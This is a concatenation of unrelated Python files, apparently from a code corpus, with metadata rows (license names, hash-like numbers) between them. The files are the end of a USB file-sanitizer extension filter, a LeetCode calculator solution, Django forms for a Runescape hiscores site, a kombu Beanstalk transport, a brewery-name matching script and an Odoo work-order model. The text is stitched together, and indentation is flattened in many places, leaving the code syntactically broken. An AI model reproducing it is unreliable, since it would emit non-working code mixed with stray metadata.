shopbot = ['.ai', '.svg', '.dxf', '.dwg', '.eps']
omax = ['.ai', '.svg', '.dxf', '.dwg', '.eps', '.omx', '.obj']
epilog_laser = ['.ai', '.svg', '.dxf', '.dwg', '.eps']
metabeam = ['.dxf']
up = ['.upp', '.up3', '.stl', '.obj']
class FilePier9(FileBase):
def __init__(self, src_path, dst_path):
''' Init file object, set the extension '''
super(FilePier9, self).__init__(src_path, dst_path)
a, self.extension = os.path.splitext(self.src_path)
class KittenGroomerPier9(KittenGroomerBase):
def __init__(self, root_src=None, root_dst=None):
'''
Initialize the basics of the copy
'''
if root_src is None:
root_src = os.path.join(os.sep, 'media', 'src')
if root_dst is None:
root_dst = os.path.join(os.sep, 'media', 'dst')
super(KittenGroomerPier9, self).__init__(root_src, root_dst)
        # The initial version will accept all the file extensions for all the machines.
self.authorized_extensions = printers + cnc + shopbot + omax + epilog_laser + metabeam + up
def _print_log(self):
'''
Print the logs related to the current file being processed
'''
tmp_log = self.log_name.fields(**self.cur_file.log_details)
if not self.cur_file.log_details.get('valid'):
tmp_log.warning(self.cur_file.log_string)
else:
tmp_log.debug(self.cur_file.log_string)
def processdir(self):
'''
Main function doing the processing
'''
for srcpath in self._list_all_files(self.src_root_dir):
self.log_name.info('Processing {}', srcpath.replace(self.src_root_dir + '/', ''))
self.cur_file = FilePier9(srcpath, srcpath.replace(self.src_root_dir, self.dst_root_dir))
if self.cur_file.extension in self.authorized_extensions:
self.cur_file.add_log_details('valid', True)
self.cur_file.log_string = 'Expected extension: ' + self.cur_file.extension
self._safe_copy()
else:
self.cur_file.log_string = 'Bad extension: ' + self.cur_file.extension
self._print_log()
if __name__ == '__main__':
main(KittenGroomerPier9)
|
bsd-3-clause
| 8,387,122,660,357,544,000
| 36.132353
| 101
| 0.565149
| false
| 3.216561
| false
| false
| false
|
zqfan/leetcode
|
algorithms/227. Basic Calculator II/solution.py
|
1
|
1095
|
import collections
import operator


class Solution(object):
def calculate(self, s):
"""
:type s: str
:rtype: int
"""
queue = collections.deque()
method = {
"+": operator.add,
"-": operator.sub,
"*": operator.mul,
"/": operator.div
}
pri = {
operator.add: 0,
operator.sub: 0,
operator.mul: 1,
operator.div: 1
}
i = 0; n = 0
while i < len(s):
if s[i].isdigit():
n = n * 10 + int(s[i])
elif s[i] in method:
while queue and pri[method[s[i]]] <= pri[queue[-1]]:
op = queue.pop()
n1 = queue.pop()
n = op(n1, n)
queue.append(n)
queue.append(method[s[i]])
n = 0
i += 1
queue.append(n)
while len(queue) >= 3:
n1 = queue.pop()
op = queue.pop()
n2 = queue.pop()
queue.append(op(n2, n1))
return queue.pop()
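# Hedged usage sketch (Python 2, since operator.div is used above):
if __name__ == '__main__':
    print(Solution().calculate("3+2*2"))  # 7
    print(Solution().calculate(" 3/2 "))  # 1 (truncating integer division)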
|
gpl-3.0
| 8,992,052,370,713,019,000
| 27.076923
| 68
| 0.368037
| false
| 3.99635
| false
| false
| false
|
RaghavPro/Runescape-Hiscores
|
hiscores/forms.py
|
1
|
2377
|
from django import forms
from django.core.exceptions import FieldError
from .models import Skills
class SearchForm(forms.Form):
search = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username', 'required': ''}),
max_length=12, label=False)
def clean_search(self):
search = self.cleaned_data['search']
try:
Skills.objects.get(user_name__iexact=search)
except Skills.DoesNotExist:
            raise forms.ValidationError("Player does not exist.")
        return search
class CompareForm(forms.Form):
player1 = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username', 'required': ''}),
max_length=12, label=False)
player2 = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username', 'required': ''}),
max_length=12, label=False)
def clean_player1(self):
player1 = self.cleaned_data['player1']
try:
Skills.objects.get(user_name__iexact=player1)
except Skills.DoesNotExist:
raise forms.ValidationError("Player does not exist.")
return player1
def clean_player2(self):
player2 = self.cleaned_data['player2']
try:
Skills.objects.get(user_name__iexact=player2)
except Skills.DoesNotExist:
raise forms.ValidationError("Player does not exist.")
return player2
class SearchRankForm(forms.Form):
search_rank = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Rank', 'required': ''}),
max_length=30, label=False)
skill_exp = forms.CharField(widget=forms.HiddenInput())
def clean_search_rank(self):
rank = self.cleaned_data['search_rank']
skill_exp = self.data['skill_exp']
try:
rank = max(int(rank), 1) # Take to first rank if negative
user_name = Skills.objects.order_by("-%s" % skill_exp).values("user_name")[rank - 1]['user_name']
except IndexError:
raise forms.ValidationError("That rank does not exist.")
except FieldError:
raise forms.ValidationError("Oops, please try again.")
except ValueError:
raise forms.ValidationError("Enter a valid number.")
return user_name
|
gpl-2.0
| 856,744,986,639,875,300
| 36.730159
| 109
| 0.63231
| false
| 4.063248
| false
| false
| false
|
kevinr/750book-web
|
750book-web-env/lib/python2.7/site-packages/kombu/transport/beanstalk.py
|
1
|
3295
|
"""
kombu.transport.beanstalk
=========================
Beanstalk transport.
:copyright: (c) 2010 - 2012 by David Ziegler.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import socket
from Queue import Empty
from anyjson import loads, dumps
from beanstalkc import Connection, BeanstalkcException, SocketError
from . import virtual
from ..exceptions import StdChannelError
DEFAULT_PORT = 11300
__author__ = "David Ziegler <david.ziegler@gmail.com>"
class Channel(virtual.Channel):
_client = None
def _parse_job(self, job):
item, dest = None, None
if job:
try:
item = loads(job.body)
dest = job.stats()["tube"]
except Exception:
job.bury()
else:
job.delete()
else:
raise Empty()
return item, dest
def _put(self, queue, message, **kwargs):
priority = message["properties"]["delivery_info"]["priority"]
self.client.use(queue)
self.client.put(dumps(message), priority=priority)
def _get(self, queue):
if queue not in self.client.watching():
self.client.watch(queue)
        for active in self.client.watching():
            if active != queue:
                self.client.ignore(active)
job = self.client.reserve(timeout=1)
item, dest = self._parse_job(job)
return item
def _get_many(self, queues, timeout=1):
# timeout of None will cause beanstalk to timeout waiting
# for a new request
if timeout is None:
timeout = 1
watching = self.client.watching()
        for active in queues:
            if active not in watching:
                self.client.watch(active)
job = self.client.reserve(timeout=timeout)
return self._parse_job(job)
def _purge(self, queue):
if queue not in self.client.watching():
self.client.watch(queue)
        for active in self.client.watching():
            if active != queue:
                self.client.ignore(active)
count = 0
while 1:
job = self.client.reserve(timeout=1)
if job:
job.delete()
count += 1
else:
break
return count
def _size(self, queue):
return 0
def _open(self):
conninfo = self.connection.client
port = conninfo.port or DEFAULT_PORT
conn = Connection(host=conninfo.hostname, port=port)
conn.connect()
return conn
def close(self):
if self._client is not None:
return self._client.close()
super(Channel, self).close()
@property
def client(self):
if self._client is None:
self._client = self._open()
return self._client
class Transport(virtual.Transport):
Channel = Channel
polling_interval = 1
default_port = DEFAULT_PORT
connection_errors = (socket.error,
SocketError,
IOError)
channel_errors = (StdChannelError,
socket.error,
IOError,
SocketError,
BeanstalkcException)
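# Hedged usage sketch (illustrative, not part of the transport): kombu selects
# this transport via the 'beanstalk' URL scheme; assumes a beanstalkd server
# listening on the default port.
if __name__ == '__main__':
    from kombu import Connection
    with Connection('beanstalk://localhost:11300') as conn:
        demo_queue = conn.SimpleQueue('kombu_demo')
        demo_queue.put({'hello': 'world'})
        print(demo_queue.get(timeout=5).payload)
        demo_queue.close()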
|
mit
| 6,936,786,577,293,115,000
| 24.944882
| 69
| 0.553869
| false
| 4.240669
| false
| false
| false
|
atlefren/beerdatabase
|
breweryname_compare.py
|
1
|
1755
|
# -*- coding: utf-8 -*-
import json
from beertools import BreweryNameMatcher
def read_json(filename):
with open(filename, 'r') as infile:
return json.loads(infile.read())
def get_breweries_polet():
with open('data/polet.json', 'r') as infile:
data = json.loads(infile.read())
breweries = list(set([product['Produsent'] for product in data]))
return sorted(breweries), data
def get_breweries(beer_list, property_name):
return sorted(list(set([beer[property_name] for beer in beer_list])))
def get_breweries_ratebeer():
with open('data/ratebeer.json', 'r') as infile:
data = json.loads(infile.read())
breweries = list(set([product['brewery'] for product in data]))
return sorted(breweries)
def wrap_breweries(breweries):
return [{'id': index, 'name': brewery}
for index, brewery in enumerate(breweries)]
def compare_breweries(pol_data, breweries_rb):
breweries_pol = get_breweries(pol_data, 'Produsent')
# breweries_rb = wrap_breweries(get_breweries(rb_data, 'brewery'))
matcher = BreweryNameMatcher(breweries_rb)
with open('data/nomatch.txt', 'w') as nomatch:
with open('data/match.txt', 'w') as match_file:
for brewery in breweries_pol:
match = matcher.match_name(brewery)
if match is None:
nomatch.write(brewery.encode('utf8') + '\n')
else:
string = '%s: %s' % (brewery, match['name'])
match_file.write(string.encode('utf8') + '\n')
if __name__ == '__main__':
pol_data = read_json('data/polet.json')
rb_breweries = read_json('data/rb_breweries.json')
compare_breweries(pol_data, rb_breweries)
|
mit
| 8,518,859,701,575,844,000
| 30.909091
| 73
| 0.614815
| false
| 3.179348
| false
| false
| false
|
ddico/odoo
|
addons/mrp/models/mrp_workorder.py
|
1
|
39609
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from collections import defaultdict
import json
from odoo import api, fields, models, _, SUPERUSER_ID
from odoo.exceptions import UserError
from odoo.tools import float_compare, float_round, format_datetime
class MrpWorkorder(models.Model):
_name = 'mrp.workorder'
_description = 'Work Order'
_inherit = ['mail.thread', 'mail.activity.mixin']
def _read_group_workcenter_id(self, workcenters, domain, order):
workcenter_ids = self.env.context.get('default_workcenter_id')
if not workcenter_ids:
workcenter_ids = workcenters._search([], order=order, access_rights_uid=SUPERUSER_ID)
return workcenters.browse(workcenter_ids)
name = fields.Char(
'Work Order', required=True,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]})
workcenter_id = fields.Many2one(
'mrp.workcenter', 'Work Center', required=True,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)], 'progress': [('readonly', True)]},
group_expand='_read_group_workcenter_id', check_company=True)
working_state = fields.Selection(
string='Workcenter Status', related='workcenter_id.working_state', readonly=False,
help='Technical: used in views only')
product_id = fields.Many2one(related='production_id.product_id', readonly=True, store=True, check_company=True)
product_tracking = fields.Selection(related="product_id.tracking")
product_uom_id = fields.Many2one('uom.uom', 'Unit of Measure', required=True, readonly=True)
use_create_components_lots = fields.Boolean(related="production_id.picking_type_id.use_create_components_lots")
production_id = fields.Many2one('mrp.production', 'Manufacturing Order', required=True, check_company=True)
production_availability = fields.Selection(
string='Stock Availability', readonly=True,
related='production_id.reservation_state', store=True,
help='Technical: used in views and domains only.')
production_state = fields.Selection(
string='Production State', readonly=True,
related='production_id.state',
help='Technical: used in views only.')
production_bom_id = fields.Many2one('mrp.bom', related='production_id.bom_id')
qty_production = fields.Float('Original Production Quantity', readonly=True, related='production_id.product_qty')
company_id = fields.Many2one(related='production_id.company_id')
qty_producing = fields.Float(
compute='_compute_qty_producing', inverse='_set_qty_producing',
string='Currently Produced Quantity', digits='Product Unit of Measure')
qty_remaining = fields.Float('Quantity To Be Produced', compute='_compute_qty_remaining', digits='Product Unit of Measure')
qty_produced = fields.Float(
'Quantity', default=0.0,
readonly=True,
digits='Product Unit of Measure',
copy=False,
help="The number of products already handled by this work order")
is_produced = fields.Boolean(string="Has Been Produced",
compute='_compute_is_produced')
state = fields.Selection([
('pending', 'Waiting for another WO'),
('ready', 'Ready'),
('progress', 'In Progress'),
('done', 'Finished'),
('cancel', 'Cancelled')], string='Status',
default='pending', copy=False, readonly=True)
leave_id = fields.Many2one(
'resource.calendar.leaves',
help='Slot into workcenter calendar once planned',
check_company=True, copy=False)
date_planned_start = fields.Datetime(
'Scheduled Start Date',
compute='_compute_dates_planned',
inverse='_set_dates_planned',
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]},
store=True, tracking=True, copy=False)
date_planned_finished = fields.Datetime(
'Scheduled End Date',
compute='_compute_dates_planned',
inverse='_set_dates_planned',
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]},
store=True, tracking=True, copy=False)
date_start = fields.Datetime(
'Start Date', copy=False,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]})
date_finished = fields.Datetime(
'End Date', copy=False,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]})
duration_expected = fields.Float(
'Expected Duration', digits=(16, 2), default=60.0,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]},
help="Expected duration (in minutes)")
duration = fields.Float(
'Real Duration', compute='_compute_duration',
readonly=True, store=True)
duration_unit = fields.Float(
'Duration Per Unit', compute='_compute_duration',
readonly=True, store=True)
duration_percent = fields.Integer(
'Duration Deviation (%)', compute='_compute_duration',
group_operator="avg", readonly=True, store=True)
progress = fields.Float('Progress Done (%)', digits=(16, 2), compute='_compute_progress')
operation_id = fields.Many2one(
'mrp.routing.workcenter', 'Operation', check_company=True)
# Should be used differently as BoM can change in the meantime
worksheet = fields.Binary(
'Worksheet', related='operation_id.worksheet', readonly=True)
worksheet_type = fields.Selection(
string='Worksheet Type', related='operation_id.worksheet_type', readonly=True)
worksheet_google_slide = fields.Char(
'Worksheet URL', related='operation_id.worksheet_google_slide', readonly=True)
operation_note = fields.Text("Description", related='operation_id.note', readonly=True)
move_raw_ids = fields.One2many(
'stock.move', 'workorder_id', 'Raw Moves',
domain=[('raw_material_production_id', '!=', False), ('production_id', '=', False)])
move_finished_ids = fields.One2many(
'stock.move', 'workorder_id', 'Finished Moves',
domain=[('raw_material_production_id', '=', False), ('production_id', '!=', False)])
move_line_ids = fields.One2many(
'stock.move.line', 'workorder_id', 'Moves to Track',
help="Inventory moves for which you must scan a lot number at this work order")
finished_lot_id = fields.Many2one(
'stock.production.lot', string='Lot/Serial Number', compute='_compute_finished_lot_id',
inverse='_set_finished_lot_id', domain="[('product_id', '=', product_id), ('company_id', '=', company_id)]",
check_company=True)
time_ids = fields.One2many(
'mrp.workcenter.productivity', 'workorder_id', copy=False)
is_user_working = fields.Boolean(
'Is the Current User Working', compute='_compute_working_users',
help="Technical field indicating whether the current user is working. ")
working_user_ids = fields.One2many('res.users', string='Working user on this work order.', compute='_compute_working_users')
last_working_user_id = fields.One2many('res.users', string='Last user that worked on this work order.', compute='_compute_working_users')
next_work_order_id = fields.Many2one('mrp.workorder', "Next Work Order", check_company=True)
scrap_ids = fields.One2many('stock.scrap', 'workorder_id')
scrap_count = fields.Integer(compute='_compute_scrap_move_count', string='Scrap Move')
production_date = fields.Datetime('Production Date', related='production_id.date_planned_start', store=True, readonly=False)
json_popover = fields.Char('Popover Data JSON', compute='_compute_json_popover')
show_json_popover = fields.Boolean('Show Popover?', compute='_compute_json_popover')
consumption = fields.Selection([
('strict', 'Strict'),
('warning', 'Warning'),
('flexible', 'Flexible')],
required=True,
)
@api.depends('production_state', 'date_planned_start', 'date_planned_finished')
def _compute_json_popover(self):
previous_wo_data = self.env['mrp.workorder'].read_group(
[('next_work_order_id', 'in', self.ids)],
['ids:array_agg(id)', 'date_planned_start:max', 'date_planned_finished:max'],
['next_work_order_id'])
previous_wo_dict = dict([(x['next_work_order_id'][0], {
'id': x['ids'][0],
'date_planned_start': x['date_planned_start'],
'date_planned_finished': x['date_planned_finished']})
for x in previous_wo_data])
if self.ids:
conflicted_dict = self._get_conflicted_workorder_ids()
for wo in self:
infos = []
if not wo.date_planned_start or not wo.date_planned_finished or not wo.ids:
wo.show_json_popover = False
wo.json_popover = False
continue
if wo.state in ['pending', 'ready']:
previous_wo = previous_wo_dict.get(wo.id)
prev_start = previous_wo and previous_wo['date_planned_start'] or False
prev_finished = previous_wo and previous_wo['date_planned_finished'] or False
if wo.state == 'pending' and prev_start and not (prev_start > wo.date_planned_start):
infos.append({
'color': 'text-primary',
'msg': _("Waiting the previous work order, planned from %(start)s to %(end)s",
start=format_datetime(self.env, prev_start, dt_format=False),
end=format_datetime(self.env, prev_finished, dt_format=False))
})
if wo.date_planned_finished < fields.Datetime.now():
infos.append({
'color': 'text-warning',
'msg': _("The work order should have already been processed.")
})
if prev_start and prev_start > wo.date_planned_start:
infos.append({
'color': 'text-danger',
'msg': _("Scheduled before the previous work order, planned from %(start)s to %(end)s",
start=format_datetime(self.env, prev_start, dt_format=False),
end=format_datetime(self.env, prev_finished, dt_format=False))
})
if conflicted_dict.get(wo.id):
infos.append({
'color': 'text-danger',
'msg': _("Planned at the same time than other workorder(s) at %s", wo.workcenter_id.display_name)
})
color_icon = infos and infos[-1]['color'] or False
wo.show_json_popover = bool(color_icon)
wo.json_popover = json.dumps({
'infos': infos,
'color': color_icon,
'icon': 'fa-exclamation-triangle' if color_icon in ['text-warning', 'text-danger'] else 'fa-info-circle',
'replan': color_icon not in [False, 'text-primary']
})
@api.depends('production_id.lot_producing_id')
def _compute_finished_lot_id(self):
for workorder in self:
workorder.finished_lot_id = workorder.production_id.lot_producing_id
def _set_finished_lot_id(self):
for workorder in self:
workorder.production_id.lot_producing_id = workorder.finished_lot_id
@api.depends('production_id.qty_producing')
def _compute_qty_producing(self):
for workorder in self:
workorder.qty_producing = workorder.production_id.qty_producing
def _set_qty_producing(self):
for workorder in self:
workorder.production_id.qty_producing = workorder.qty_producing
workorder.production_id._set_qty_producing()
    # Both `date_planned_start` and `date_planned_finished` are related fields on `leave_id`. Let's say
    # we slide a workorder on a gantt view: a single call to write is made with both
    # field changes. As the ORM doesn't batch the write on related fields and instead
    # makes multiple calls, the constraint check_dates() is raised.
    # That's why the compute and set methods are needed: to ensure the dates are updated
    # at the same time.
@api.depends('leave_id')
def _compute_dates_planned(self):
for workorder in self:
workorder.date_planned_start = workorder.leave_id.date_from
workorder.date_planned_finished = workorder.leave_id.date_to
def _set_dates_planned(self):
date_from = self[0].date_planned_start
date_to = self[0].date_planned_finished
self.mapped('leave_id').write({
'date_from': date_from,
'date_to': date_to,
})
def name_get(self):
res = []
for wo in self:
if len(wo.production_id.workorder_ids) == 1:
res.append((wo.id, "%s - %s - %s" % (wo.production_id.name, wo.product_id.name, wo.name)))
else:
res.append((wo.id, "%s - %s - %s - %s" % (wo.production_id.workorder_ids.ids.index(wo.id) + 1, wo.production_id.name, wo.product_id.name, wo.name)))
return res
def unlink(self):
# Removes references to workorder to avoid Validation Error
(self.mapped('move_raw_ids') | self.mapped('move_finished_ids')).write({'workorder_id': False})
self.mapped('leave_id').unlink()
mo_dirty = self.production_id.filtered(lambda mo: mo.state in ("confirmed", "progress", "to_close"))
res = super().unlink()
# We need to go through `_action_confirm` for all workorders of the current productions to
# make sure the links between them are correct (`next_work_order_id` could be obsolete now).
mo_dirty.workorder_ids._action_confirm()
return res
@api.depends('production_id.product_qty', 'qty_produced', 'production_id.product_uom_id')
def _compute_is_produced(self):
self.is_produced = False
for order in self.filtered(lambda p: p.production_id and p.production_id.product_uom_id):
rounding = order.production_id.product_uom_id.rounding
order.is_produced = float_compare(order.qty_produced, order.production_id.product_qty, precision_rounding=rounding) >= 0
@api.depends('time_ids.duration', 'qty_produced')
def _compute_duration(self):
for order in self:
order.duration = sum(order.time_ids.mapped('duration'))
order.duration_unit = round(order.duration / max(order.qty_produced, 1), 2) # rounding 2 because it is a time
if order.duration_expected:
order.duration_percent = 100 * (order.duration_expected - order.duration) / order.duration_expected
else:
order.duration_percent = 0
@api.depends('duration', 'duration_expected', 'state')
def _compute_progress(self):
for order in self:
if order.state == 'done':
order.progress = 100
elif order.duration_expected:
order.progress = order.duration * 100 / order.duration_expected
else:
order.progress = 0
def _compute_working_users(self):
""" Checks whether the current user is working, all the users currently working and the last user that worked. """
for order in self:
order.working_user_ids = [(4, order.id) for order in order.time_ids.filtered(lambda time: not time.date_end).sorted('date_start').mapped('user_id')]
if order.working_user_ids:
order.last_working_user_id = order.working_user_ids[-1]
elif order.time_ids:
order.last_working_user_id = order.time_ids.sorted('date_end')[-1].user_id
else:
order.last_working_user_id = False
if order.time_ids.filtered(lambda x: (x.user_id.id == self.env.user.id) and (not x.date_end) and (x.loss_type in ('productive', 'performance'))):
order.is_user_working = True
else:
order.is_user_working = False
def _compute_scrap_move_count(self):
data = self.env['stock.scrap'].read_group([('workorder_id', 'in', self.ids)], ['workorder_id'], ['workorder_id'])
count_data = dict((item['workorder_id'][0], item['workorder_id_count']) for item in data)
for workorder in self:
workorder.scrap_count = count_data.get(workorder.id, 0)
@api.onchange('date_planned_finished')
def _onchange_date_planned_finished(self):
if self.date_planned_start and self.date_planned_finished:
diff = self.date_planned_finished - self.date_planned_start
self.duration_expected = diff.total_seconds() / 60
@api.onchange('operation_id')
def _onchange_operation_id(self):
if self.operation_id:
self.name = self.operation_id.name
self.workcenter_id = self.operation_id.workcenter_id.id
@api.onchange('date_planned_start', 'duration_expected')
def _onchange_date_planned_start(self):
if self.date_planned_start and self.duration_expected:
self.date_planned_finished = self.date_planned_start + relativedelta(minutes=self.duration_expected)
@api.onchange('operation_id', 'workcenter_id', 'qty_production')
def _onchange_expected_duration(self):
self.duration_expected = self._get_duration_expected()
def write(self, values):
if 'production_id' in values:
raise UserError(_('You cannot link this work order to another manufacturing order.'))
if 'workcenter_id' in values:
for workorder in self:
if workorder.workcenter_id.id != values['workcenter_id']:
if workorder.state in ('progress', 'done', 'cancel'):
raise UserError(_('You cannot change the workcenter of a work order that is in progress or done.'))
workorder.leave_id.resource_id = self.env['mrp.workcenter'].browse(values['workcenter_id']).resource_id
if any(k not in ['time_ids', 'duration_expected', 'next_work_order_id'] for k in values.keys()) and any(workorder.state == 'done' for workorder in self):
            raise UserError(_('You cannot change the finished work order.'))
if 'date_planned_start' in values or 'date_planned_finished' in values:
for workorder in self:
start_date = fields.Datetime.to_datetime(values.get('date_planned_start')) or workorder.date_planned_start
end_date = fields.Datetime.to_datetime(values.get('date_planned_finished')) or workorder.date_planned_finished
if start_date and end_date and start_date > end_date:
raise UserError(_('The planned end date of the work order cannot be prior to the planned start date, please correct this to save the work order.'))
# Update MO dates if the start date of the first WO or the
            # finished date of the last WO is updated.
if workorder == workorder.production_id.workorder_ids[0] and 'date_planned_start' in values:
if values['date_planned_start']:
workorder.production_id.with_context(force_date=True).write({
'date_planned_start': fields.Datetime.to_datetime(values['date_planned_start'])
})
if workorder == workorder.production_id.workorder_ids[-1] and 'date_planned_finished' in values:
if values['date_planned_finished']:
workorder.production_id.with_context(force_date=True).write({
'date_planned_finished': fields.Datetime.to_datetime(values['date_planned_finished'])
})
return super(MrpWorkorder, self).write(values)
@api.model_create_multi
def create(self, values):
res = super().create(values)
# Auto-confirm manually added workorders.
# We need to go through `_action_confirm` for all workorders of the current productions to
# make sure the links between them are correct.
to_confirm = res.filtered(lambda wo: wo.production_id.state in ("confirmed", "progress", "to_close"))
to_confirm = to_confirm.production_id.workorder_ids
to_confirm._action_confirm()
return res
def _action_confirm(self):
workorders_by_production = defaultdict(lambda: self.env['mrp.workorder'])
for workorder in self:
workorders_by_production[workorder.production_id] |= workorder
for production, workorders in workorders_by_production.items():
workorders_by_bom = defaultdict(lambda: self.env['mrp.workorder'])
bom = self.env['mrp.bom']
moves = production.move_raw_ids | production.move_finished_ids
for workorder in self:
if workorder.operation_id.bom_id:
bom = workorder.operation_id.bom_id
if not bom:
bom = workorder.production_id.bom_id
previous_workorder = workorders_by_bom[bom][-1:]
previous_workorder.next_work_order_id = workorder.id
workorders_by_bom[bom] |= workorder
moves.filtered(lambda m: m.operation_id == workorder.operation_id).write({
'workorder_id': workorder.id
})
exploded_boms, dummy = production.bom_id.explode(production.product_id, 1, picking_type=production.bom_id.picking_type_id)
exploded_boms = {b[0]: b[1] for b in exploded_boms}
for move in moves:
if move.workorder_id:
continue
bom = move.bom_line_id.bom_id
while bom and bom not in workorders_by_bom:
bom_data = exploded_boms.get(bom, {})
bom = bom_data.get('parent_line') and bom_data['parent_line'].bom_id or False
if bom in workorders_by_bom:
move.write({
'workorder_id': workorders_by_bom[bom][-1:].id
})
else:
move.write({
'workorder_id': workorders_by_bom[production.bom_id][-1:].id
})
for workorders in workorders_by_bom.values():
if workorders[0].state == 'pending':
workorders[0].state = 'ready'
for workorder in workorders:
workorder._start_nextworkorder()
def _get_byproduct_move_to_update(self):
return self.production_id.move_finished_ids.filtered(lambda x: (x.product_id.id != self.production_id.product_id.id) and (x.state not in ('done', 'cancel')))
def _start_nextworkorder(self):
rounding = self.product_id.uom_id.rounding
if self.next_work_order_id.state == 'pending' and (
(self.operation_id.batch == 'no' and
float_compare(self.qty_production, self.qty_produced, precision_rounding=rounding) <= 0) or
(self.operation_id.batch == 'yes' and
float_compare(self.operation_id.batch_size, self.qty_produced, precision_rounding=rounding) <= 0)):
self.next_work_order_id.state = 'ready'
if self.state == 'done' and self.next_work_order_id.state == 'pending':
self.next_work_order_id.state = 'ready'
@api.model
def gantt_unavailability(self, start_date, end_date, scale, group_bys=None, rows=None):
"""Get unavailabilities data to display in the Gantt view."""
workcenter_ids = set()
def traverse_inplace(func, row, **kargs):
res = func(row, **kargs)
if res:
kargs.update(res)
for row in row.get('rows'):
traverse_inplace(func, row, **kargs)
def search_workcenter_ids(row):
if row.get('groupedBy') and row.get('groupedBy')[0] == 'workcenter_id' and row.get('resId'):
workcenter_ids.add(row.get('resId'))
for row in rows:
traverse_inplace(search_workcenter_ids, row)
start_datetime = fields.Datetime.to_datetime(start_date)
end_datetime = fields.Datetime.to_datetime(end_date)
workcenters = self.env['mrp.workcenter'].browse(workcenter_ids)
unavailability_mapping = workcenters._get_unavailability_intervals(start_datetime, end_datetime)
# Only notable intervals (at least one cell wide) are sent to the front-end, to avoid sending useless information
cell_dt = (scale in ['day', 'week'] and timedelta(hours=1)) or (scale == 'month' and timedelta(days=1)) or timedelta(days=28)
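# For clarity: the expression above resolves to 1-hour cells for the 'day'
# and 'week' scales, 1-day cells for 'month', and 28-day cells otherwise
# (e.g. 'year'); only gaps at least one cell wide survive the filter below
# and are rendered as unavailabilities in the Gantt view.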
def add_unavailability(row, workcenter_id=None):
if row.get('groupedBy') and row.get('groupedBy')[0] == 'workcenter_id' and row.get('resId'):
workcenter_id = row.get('resId')
if workcenter_id:
notable_intervals = filter(lambda interval: interval[1] - interval[0] >= cell_dt, unavailability_mapping[workcenter_id])
row['unavailabilities'] = [{'start': interval[0], 'stop': interval[1]} for interval in notable_intervals]
return {'workcenter_id': workcenter_id}
for row in rows:
traverse_inplace(add_unavailability, row)
return rows
def button_start(self):
self.ensure_one()
# button_start is automatically called in the new view, so skip workorders that are already done or cancelled
if self.state in ('done', 'cancel'):
return True
if self.product_tracking == 'serial':
self.qty_producing = 1.0
# A productivity loss is needed in case the real time exceeds the expected duration
timeline = self.env['mrp.workcenter.productivity']
if not self.duration_expected or self.duration < self.duration_expected:
loss_id = self.env['mrp.workcenter.productivity.loss'].search([('loss_type','=','productive')], limit=1)
if not len(loss_id):
raise UserError(_("You need to define at least one productivity loss in the category 'Productivity'. Create one from the Manufacturing app, menu: Configuration / Productivity Losses."))
else:
loss_id = self.env['mrp.workcenter.productivity.loss'].search([('loss_type','=','performance')], limit=1)
if not len(loss_id):
raise UserError(_("You need to define at least one productivity loss in the category 'Performance'. Create one from the Manufacturing app, menu: Configuration / Productivity Losses."))
if self.production_id.state != 'progress':
self.production_id.write({
'date_start': datetime.now(),
})
timeline.create({
'workorder_id': self.id,
'workcenter_id': self.workcenter_id.id,
'description': _('Time Tracking: ') + self.env.user.name,
'loss_id': loss_id[0].id,
'date_start': datetime.now(),
'user_id': self.env.user.id, # FIXME sle: can be inconsistent with company_id
'company_id': self.company_id.id,
})
if self.state == 'progress':
return True
start_date = datetime.now()
vals = {
'state': 'progress',
'date_start': start_date,
}
if not self.leave_id:
leave = self.env['resource.calendar.leaves'].create({
'name': self.display_name,
'calendar_id': self.workcenter_id.resource_calendar_id.id,
'date_from': start_date,
'date_to': start_date + relativedelta(minutes=self.duration_expected),
'resource_id': self.workcenter_id.resource_id.id,
'time_type': 'other'
})
vals['leave_id'] = leave.id
return self.write(vals)
else:
vals['date_planned_start'] = start_date
if self.date_planned_finished < start_date:
vals['date_planned_finished'] = start_date
return self.write(vals)
def button_finish(self):
end_date = datetime.now()
for workorder in self:
if workorder.state in ('done', 'cancel'):
continue
workorder.end_all()
vals = {
'state': 'done',
'date_finished': end_date,
'date_planned_finished': end_date
}
if not workorder.date_start:
vals['date_start'] = end_date
if not workorder.date_planned_start or end_date < workorder.date_planned_start:
vals['date_planned_start'] = end_date
workorder.write(vals)
workorder._start_nextworkorder()
return True
def end_previous(self, doall=False):
"""
:param doall: when True, close all open timelines on the open work orders;
otherwise close only the current user's timeline
"""
# TDE CLEANME
timeline_obj = self.env['mrp.workcenter.productivity']
domain = [('workorder_id', 'in', self.ids), ('date_end', '=', False)]
if not doall:
domain.append(('user_id', '=', self.env.user.id))
not_productive_timelines = timeline_obj.browse()
for timeline in timeline_obj.search(domain, limit=None if doall else 1):
wo = timeline.workorder_id
if wo.duration_expected <= wo.duration:
if timeline.loss_type == 'productive':
not_productive_timelines += timeline
timeline.write({'date_end': fields.Datetime.now()})
else:
maxdate = fields.Datetime.from_string(timeline.date_start) + relativedelta(minutes=wo.duration_expected - wo.duration)
enddate = datetime.now()
if maxdate > enddate:
timeline.write({'date_end': enddate})
else:
timeline.write({'date_end': maxdate})
not_productive_timelines += timeline.copy({'date_start': maxdate, 'date_end': enddate})
if not_productive_timelines:
loss_id = self.env['mrp.workcenter.productivity.loss'].search([('loss_type', '=', 'performance')], limit=1)
if not len(loss_id):
raise UserError(_("You need to define at least one unactive productivity loss in the category 'Performance'. Create one from the Manufacturing app, menu: Configuration / Productivity Losses."))
not_productive_timelines.write({'loss_id': loss_id.id})
return True
def end_all(self):
return self.end_previous(doall=True)
def button_pending(self):
self.end_previous()
return True
def button_unblock(self):
for order in self:
order.workcenter_id.unblock()
return True
def action_cancel(self):
self.leave_id.unlink()
